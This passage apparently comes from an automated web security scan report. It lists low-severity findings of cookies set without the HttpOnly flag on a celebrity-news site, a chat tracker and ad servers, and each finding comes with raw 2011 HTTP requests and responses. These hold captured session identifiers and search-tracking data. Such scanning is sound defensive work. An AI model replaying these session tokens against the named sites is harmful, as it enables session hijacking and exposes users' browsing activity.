<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

12.27. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toofab.com
Path:   /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __qca=P0-1777464361-1316238721670; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520Homepage%252520%25255B%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:59 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:50:59 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:50:59 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 71853
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

12.28. http://www.toofab.com/category/celeb-couples/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toofab.com
Path:   /category/celeb-couples/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/celeb-couples/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DHollywood%252520News%25252C%252520Red%252520Carpet%252520Fashion%252520and%252520Celebrity%252520Hairstyles%252520%25257C%252520tooFab.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/category/celeb-couples/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:08 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:09 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 01:08:08 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 31377
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/
...[SNIP]...

12.29. http://www.toofab.com/news/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toofab.com
Path:   /news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520News%252520Page%252520%25255BExclusive%25253A%252520Melissa%252520Rivers%252520Splits%252520With%252520Boyfriend%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/news/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:43 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:51:44 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:51:43 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 37064
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="text/jav
...[SNIP]...

12.30. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.websitealive2.com
Path:   /89/visitor/vTrackerSrc_v2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /89/visitor/vTrackerSrc_v2.asp?action=poll&groupid=89&websiteid=0&departmentid=0&sessionid_=30306&grouponline=Y&online_acd=&dt=IT%20On%20Command&dl=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3DVDI%26utm_campaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&wsa_custom_str=^^^^&random=0.8074273203965276 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsa=pagesvisited%5F0=1&dl%5Flast%5F0=http%3A%2F%2Fwww%2Eitoncommand%2Ecom%2FGetAQuote%2Easpx%3Futm%5Fsource%3Dgoogle%26utm%5Fmedium%3Dcpc%26utm%5Fterm%3DVDI%26utm%5Fcampaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N&lastalivetime%5F30306=9%2F16%2F2011+7%3A25%3A57+PM&cookiedetect=True; ASPSESSIONIDSCQDABCS=CBNKONCBJEMLOJKGEAPJOAOJ; ASPSESSIONIDSQBBSTRT=COPFEOCBPIMENNCNNFFIHIDH; ASPSESSIONIDQQRSSQRC=JPEMIBHBIFNFCFMIFPJEEKEH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 114
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: ASPSESSIONIDCCDCDABR=BDHDGNCBIODKLFFFMOGNODLN; path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:26:20 GMT


//alert('1');

//alert('browsing');

//alert('proactive_lastaccept=');
               

12.31. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.websitealive2.com
Path:   /89/visitor/vTrackerSrc_v2.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /89/visitor/vTrackerSrc_v2.asp?action=poll&groupid=89&websiteid=0&departmentid=0&sessionid_=30306&grouponline=Y&online_acd=&dt=IT%20On%20Command&dl=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3DVDI%26utm_campaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&wsa_custom_str=^^^^&random=0.672999129164964 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsa=pagesvisited%5F0=1&dl%5Flast%5F0=http%3A%2F%2Fwww%2Eitoncommand%2Ecom%2FGetAQuote%2Easpx%3Futm%5Fsource%3Dgoogle%26utm%5Fmedium%3Dcpc%26utm%5Fterm%3DVDI%26utm%5Fcampaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N&lastalivetime%5F30306=9%2F16%2F2011+7%3A25%3A57+PM&cookiedetect=True; ASPSESSIONIDSCQDABCS=CBNKONCBJEMLOJKGEAPJOAOJ; ASPSESSIONIDSQBBSTRT=COPFEOCBPIMENNCNNFFIHIDH; ASPSESSIONIDQQRSSQRC=JPEMIBHBIFNFCFMIFPJEEKEH; ASPSESSIONIDCCDCDABR=BDHDGNCBIODKLFFFMOGNODLN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 114
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: wsa=lastalivetime%5F30306=9%2F16%2F2011+7%3A26%3A33+PM&cookiedetect=True&proactiveauto%5Fenabled%5F0=N&lastwebsiteid=0&dl%5Flast%5F0=http%3A%2F%2Fwww%2Eitoncommand%2Ecom%2FGetAQuote%2Easpx%3Futm%5Fsource%3Dgoogle%26utm%5Fmedium%3Dcpc%26utm%5Fterm%3DVDI%26utm%5Fcampaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&pagesvisited%5F0=1; path=/89
Set-Cookie: ASPSESSIONIDSSCCSSRT=AFGIHOCBMFPLDKNJPBEEKGOA; path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:26:32 GMT


//alert('1');

//alert('browsing');

//alert('proactive_lastaccept=');
               

12.32. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.websitealive2.com
Path:   /89/visitor/vTrackerSrc_v2.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /89/visitor/vTrackerSrc_v2.asp?action=poll&groupid=89&websiteid=0&departmentid=0&sessionid_=30306&grouponline=Y&online_acd=&dt=IT%20On%20Command&dl=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3DVDI%26utm_campaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvirtual%2Bdesktop%23pq%3Dvdi%26hl%3Den%26sugexp%3Dgsis%252Ci18n%253Dtrue%26cp%3D7%26gs_id%3Dw%26xhr%3Dt%26q%3Dvdi%2Bhosting%26pf%3Dp%26sclient%3Dpsy-ab%26source%3Dhp%26pbx%3D1%26oq%3Dvdi%2Bhos%26aq%3D0%26aqi%3Dg1g-v3%26aql%3D%26gs_sm%3D%26gs_upl%3D%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db659e1e8b520709%26biw%3D1087%26bih%3D870&wsa_custom_str=^^^^&random=0.07070429134182632 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsa=lastalivetime%5F30306=9%2F16%2F2011+7%3A26%3A33+PM&cookiedetect=True&proactiveauto%5Fenabled%5F0=N&lastwebsiteid=0&dl%5Flast%5F0=http%3A%2F%2Fwww%2Eitoncommand%2Ecom%2FGetAQuote%2Easpx%3Futm%5Fsource%3Dgoogle%26utm%5Fmedium%3Dcpc%26utm%5Fterm%3DVDI%26utm%5Fcampaign%3DCampaign%2520%231%26gclid%3DCNHDra6Co6sCFUkbQgodVnkZ4Q&pagesvisited%5F0=1; ASPSESSIONIDSCQDABCS=CBNKONCBJEMLOJKGEAPJOAOJ; ASPSESSIONIDSQBBSTRT=COPFEOCBPIMENNCNNFFIHIDH; ASPSESSIONIDQQRSSQRC=JPEMIBHBIFNFCFMIFPJEEKEH; ASPSESSIONIDCCDCDABR=BDHDGNCBIODKLFFFMOGNODLN; ASPSESSIONIDSSCCSSRT=AFGIHOCBMFPLDKNJPBEEKGOA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 114
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: ASPSESSIONIDCQQCTDCB=FBIIBNCBJKHFNOKAJIAFAINO; path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:26:56 GMT


//alert('1');

//alert('browsing');

//alert('proactive_lastaccept=');
               

12.33. http://27.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://27.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=2251&camp=34930&affcode=kw2705&inhURL=&cid=7925869215&networkType=search&utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign+%231&url[]=http%3A%2F%2Fwww.itoncommand.com%2FGetAQuote.aspx&gclid=CNHDra6Co6sCFUkbQgodVnkZ4Q HTTP/1.1
Host: 27.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Fri, 16-Dec-2011 00:25:32 GMT; path=/; domain=.xg4ken.com
Location: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign #1&gclid=CNHDra6Co6sCFUkbQgodVnkZ4Q
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


12.34. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=0&ct=0&metr=127&s=b035&t=1316221067347346&adid=661884&reid=352153&arid=0&auid=&cn=defaultImpression&et=i&_cc=661884,352153,,12523.,1316221067,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr=http%3A//trk.vindicosuite.com/Tracking/V3/Instream/Impression/%3F0-496-65399-58070-8127-22419-undefined-10-3017-14-BBEEND-%26iari%3D116206%26cb%3D634515457010002879%26internalRedirect%3Dtrue%26 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _auv="g193954~1.1316221508.0,5.1316221071.0,21966.1316221508.0,21967.1316221071.0,^";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221508.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221507.1103.1.1,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221508.28800.0.0,";expires=Mon, 17 Oct 2011 01:05:08 GMT;domain=.fwmrm.net;path=/;
Location: http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/?0-496-65399-58070-8127-22419-undefined-10-3017-14-BBEEND-&iari=116206&cb=634515457010002879&internalRedirect=true&
Content-Length: 0
Date: Sat, 17 Sep 2011 01:05:08 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


12.35. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?s=b035&t=1316221067347346&cn=slotImpression&et=i&tpos=0&init=1&slid=0 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221067.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b035_5653126437071259818";expires=Sun, 16 Sep 2012 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221490.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221489.1103.1.1,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221490.28800.0.0,";expires=Mon, 17 Oct 2011 01:04:50 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:04:50 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


12.36. http://2912a.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=http%3A//ad.doubleclick.net/ad/N6357.abc.go.comOX2203/B5805994.7%3Bsz%3D1x1%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="b133_5653128344036830895";expires=Sun, 16 Sep 2012 01:05:12 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g193954~1.1316221511.0,5.1316221512.0,21966.1316221511.0,21967.1316221512.0,^";expires=Mon, 17 Oct 2011 01:05:12 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221512.28800.0.0,";expires=Mon, 17 Oct 2011 01:05:12 GMT;domain=.fwmrm.net;path=/;
Location: http://ad.doubleclick.net/ad/N6357.abc.go.comOX2203/B5805994.7;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?
Content-Length: 0
Date: Sat, 17 Sep 2011 01:05:12 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


12.37. http://2912a.v.fwmrm.net/ad/p/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
Content-Length: 1435
Origin: http://beta.abc.go.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208

<adRequest networkId="168234" profile="168234:ABC_Live" version="1"><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><supportsAdUnitInMultipleSlots />
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b035_5653126437071259818";expires=Sun, 16 Sep 2012 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221486.58849.661884~661886~,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221486.1103.1.1,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221486.28800.0.0,";expires=Mon, 17 Oct 2011 01:04:46 GMT;domain=.fwmrm.net;path=/;
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Max-Age: 1728000
Access-Control-Allow-Headers: content-type, depth, user-agent, x-file-size, x-requested-with, if-modified-since, x-file-name, cache-control
X-FW-Power-By: Smart
Content-Type: text/xml
Content-Length: 9973
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:45 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,&apos;
...[SNIP]...

12.38. http://a.collective-media.net/adj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

